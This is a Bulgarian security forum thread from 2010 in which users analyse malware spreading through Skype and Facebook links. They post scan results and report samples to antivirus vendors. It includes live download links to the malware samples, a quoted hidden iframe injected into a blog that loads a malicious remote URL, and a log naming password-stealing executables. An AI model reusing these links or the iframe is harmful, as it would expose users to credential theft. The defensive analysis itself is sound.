По Skype един приятел ми праща линк " foto http://fraicebook.net/profile.php", който при влизане в сайта сваля един ехе файл.

http://www.skatafka.com/download.php?file=a07181a0bb9eec0fe738934abf538867

ето и virustotal-a

Само 1/ 43 (2.3%).

Това ми е познато пратих го на един познат и той идиота клъвна въдицата. Това е глупост дори няма си направя труда да го пращам до аваст, който иска да праща такова нещо не може ме излъже да го стартирам.

За съжаление аваст вече не ме допуска въобще до скатафка и не ми се променят настройки за един сайт.

Ще си свалям от Линукса.

Редактирано 8 ноември 201015 г. от Burkoff (преглед на промените)

hxxp://www.skatafka.com/download.php?file=be9904b2cb16ffee24c17c1574e47de5

http://www.virustotal.com/file-scan/report.html?id=9a4e65cd543b29d1f7fbad375686410fdc75212d8f76891c3f631484be0b8266-1289363574

Result:

2 /43 (4.7%)

hxxp://www.skatafka.com/download.php?file=be9904b2cb16ffee24c17c1574e47de5  

http://www.virustota...8266-1289363574

Result:

2 /43 (4.7%)

hxxp://www.skatafka.com/download.php?file=be9904b2cb16ffee24c17c1574e47de5

http://www.virustotal.com/file-scan/report.html?id=9a4e65cd543b29d1f7fbad375686410fdc75212d8f76891c3f631484be0b8266-1289363574

Result:

2 /43 (4.7%)

При стартиране Авира го проспа,изпратен им е:

Изпратен на Eset:

Редактирано 10 ноември 201015 г. от Гост (преглед на промените)

Това ми е познато пратих го на един познат и той идиота клъвна въдицата. Това е глупост дори няма си направя труда да го пращам до аваст, който иска да праща такова нещо не може ме излъже да го стартирам.

За съжаление аваст вече не ме допуска въобще до скатафка и не ми се променят настройки за един сайт.

Ще си свалям от Линукса.

А замислял ли си се, че той не ти го е изпратил с умисъл. Самия червей се саморазпраща. Често самите жертви незнаят, че изпращат такива неща на абонатите си...

А замислял ли си се, че той не ти го е изпратил с умисъл. Самия червей се саморазпраща. Често самите жертви незнаят, че изпращат такива неща на абонатите си...

Аз бях го свалил от тук преди около месец, казах че това ми е познато, защото се трансформира често.

Трябва да си кръгал идиот, ако получиш подобно съобщение foto http://fraicebook.net/profile.php и да го свалиш и най вече стартираш.

tsqqsf.zip изтеглен от hxxp://www.duote.com/soft/28749.html съдържа ли заплаха? Реагират засега 10 програми http://www.virustotal.com/file-scan/report.html?id=3a4927d06dd99adb3194797eef663a2f74e1a4d338771ebf0fb35fa88f00a044-1289387296

Здравейте.

Всеки ден си влизам с Операта в блога ( tankobg.blog.com) и си пиша из него без проблеми. Днес по случайност влязох там с IE. И получих следното предупреждение:

Заразата истинска ли е?

Тъй като това си ми е лична страница, посещавана от доста мои познати трябва ли да ги предупредя да внимават с нея?

Налага ли се да предприемам някакви мерки - обаждане до доставчика или нещо подобно?

Редактирано 10 ноември 201015 г. от TankoBG (преглед на промените)

Здравейте.

Всеки ден си влизам с Операта в блога ( tankobg.blog.com) и си пиша из него без проблеми. Днес по случайност влязох там с IE. И получих следното предупреждение:

Заразата истинска ли е?

Тъй като това си ми е лична страница, посещавана от доста мои познати трябва ли да ги предупредя да внимават с нея?

Налага ли се да предприемам някакви мерки - обаждане до доставчика или нещо подобно?

Както виждаш Аваст е блокирал друг адрес не блога ти.

Какво общо има тука доставчика не мога да разбера ?

Ще ви свети ли какво ще прави...

Редактирано 10 ноември 201015 г. от Burkoff (преглед на промените)

Както виждаш Аваст е блокирал друг адрес не блога ти.

Да ама виж какво има в блога:

<iframe src="http://www.ieudhysta51.com/tds/in.cgi?default" 

width="1" height="1" hspace="0" vspace="0" frameborder="no" scrolling="no"></iframe> [/code]

Идва от рекламките в блога явно

Aдреса е неактивен в момента...иначе,весело

Ето ти и лога от Wepawet

Edit: Айде по темата:

http://mcaf.ee/389ae

Редактирано 10 ноември 201015 г. от Гост (преглед на промените)

hxxp://www.skatafka.com/download.php?file=be9904b2cb16ffee24c17c1574e47de5

http://www.virustotal.com/file-scan/report.html?id=9a4e65cd543b29d1f7fbad375686410fdc75212d8f76891c3f631484be0b8266-1289363574

Result:

2 /43 (4.7%)

Ако някой го е пращал значи е добавен.

Ако някой го е пращал значи е добавен.

Ми днес бях свободен и изпратих доста файлове по лабораторийте -ама и без това Касперски го блокна при стартиране !

Edit: Айде по темата:

http://mcaf.ee/389ae

От Фейсбук се е****т яко....

http://www.skatafka.com/download.php?file=5ffe6a99428bdeb6a34287db25e87b2c

Пуснах го да видя какво ще ми свали....

От тази тема

VirusTotal (3/43)

Премахнал съм файловете без PE структура...всичко бе засечено от MBAM:

Malwarebytes' Anti-Malware 1.46
www.malwarebytes.org

Database version: 5092

Windows 6.1.7600
Internet Explorer 8.0.7600.16385

11.11.2010 a. 02:14:00
mbam-log-2010-11-11 (02-14-00).txt

Scan type: Quick scan
Objects scanned: 14
Time elapsed: 3 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 14

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
C:\Users\B-boy\Desktop\Qoobox\ahma.exe (Spyware.Passwords.XGen) -> Quarantined and deleted successfully.
C:\Users\B-boy\Desktop\Qoobox\bikai.exe (Spyware.Passwords.XGen) -> Delete on reboot.
C:\Users\B-boy\Desktop\Qoobox\elydz.exe (Spyware.Passwords.XGen) -> Delete on reboot.
C:\Users\B-boy\Desktop\Qoobox\fyirs.exe (Spyware.Passwords.XGen) -> Delete on reboot.
C:\Users\B-boy\Desktop\Qoobox\iryf.exe (Spyware.Passwords.XGen) -> Delete on reboot.
C:\Users\B-boy\Desktop\Qoobox\izuvl.exe (Spyware.Passwords.XGen) -> Delete on reboot.
C:\Users\B-boy\Desktop\Qoobox\mawi.exe (Spyware.Passwords.XGen) -> Delete on reboot.
C:\Users\B-boy\Desktop\Qoobox\ofaw.exe (Spyware.Passwords.XGen) -> Delete on reboot.
C:\Users\B-boy\Desktop\Qoobox\rafy.exe (Spyware.Passwords.XGen) -> Delete on reboot.
C:\Users\B-boy\Desktop\Qoobox\wynae.exe (Spyware.Passwords.XGen) -> Delete on reboot.
C:\Users\B-boy\Desktop\Qoobox\yndoxo.exe (Spyware.Passwords.XGen) -> Delete on reboot.
C:\Users\B-boy\Desktop\Qoobox\ywda.exe (Spyware.Passwords.XGen) -> Delete on reboot.
C:\Users\B-boy\Desktop\Qoobox\zoas.exe (Spyware.Passwords.XGen) -> Delete on reboot.
C:\Users\B-boy\Desktop\Qoobox\zora.exe (Spyware.Passwords.XGen) -> Delete on reboot.

URL.txt

Аваст на самия линк ли реагира? Защото мълчи на изтегления файл - той изглежда не е заплаха за Win. Резултатите са https://www.virustotal.com/file-scan/report.html?id=c83c29972285a2fae75cf1f1bb5f625e7fd18c3fc195d30ea678747bee2fc183-1289456795 http://virscan.org/report/3b3a9fc9c0e95574daad62dae5436fb3.html Symantec EP 11 при мен не класифицира вредоносен код и изтеглянето на файлчето бе безпроблемно.

Редактирано 11 ноември 201015 г. от Totalen (преглед на промените)

Аваст на самия линк ли реагира?

Да. 2/2

От Фейсбук се е****т яко....

http://www.skatafka.com/download.php?file=5ffe6a99428bdeb6a34287db25e87b2c

Пуснах го да видя какво ще ми свали....

http://www.virustotal.com/file-scan/report.html?id=4bbd73da40627d9c68680adb9f7607c72bb14555161f9cf7e8e0b473b0bf1160-1289459571 http://virscan.org/report/87cae54612928adb909a279e93d8c9ca.html Symantec EP 11 отново мълчи

Symantec EP 11 отново мълчи

Е как нали са лидери ? :>

Ако някой го е пращал значи е добавен.

Ми днес бях свободен и изпратих доста файлове по лабораторийте -ама и без това Касперски го блокна при стартиране

Редактирано 11 ноември 201015 г. от Burkoff (преглед на промените)

http://www.virustota...1160-1289459571 http://virscan.org/r...9e93d8c9ca.html Symantec EP 11 отново мълчи

Абре човеко в архива са и 2та файла-джава аплета и троянеца,защо ги качваш наново не знам-скрийншотовете са от вирустотал ако не си обърнал внимание(:

Хах виж каква бъркотия става така: 13 /43 (30.2%)

Абре човеко в архива са и 2та файла-джава аплета и троянеца,защо ги качваш наново

Мда не е желателно да се качва архив с 2 или повече файла във вирустотал.

От тази тема

VirusTotal (3/43)

Премахнал съм файловете без PE структура...всичко бе засечено от MBAM:

Абре човеко в архива са и 2та файла-джава аплета и троянеца,защо ги качваш наново не знам-скрийншотовете са от вирустотал ако не си обърнал внимание(:

Хах виж каква бъркотия става така: 13 /43 (30.2%)

Правя го за да видим и сравним резултатите към момента. Разархивирах файла и поразгледах NortonAV.exe - защо Symantec трябва да не мълчи? А защо няма инфекция при мен?

Тия прозорци си ги наредил, като гърненца... Не можа ли само един да оставиш и да споменеш, че всичко го засича по един и същ начин.

Редактирано 11 ноември 201015 г. от Burkoff (преглед на промените)

Правя го за да видим и сравним резултатите към момента. Разархивирах файла и поразгледах NortonAV.exe - защо Symantec трябва да не мълчи?   А защо няма инфекция при мен?

Грешка правиш-и 2та файла се засичат от Касперски,а на линка който си дал показва само Java-та(:,качвай ги по един за да не става объркване.Не знам защо няма инфекция при теб(: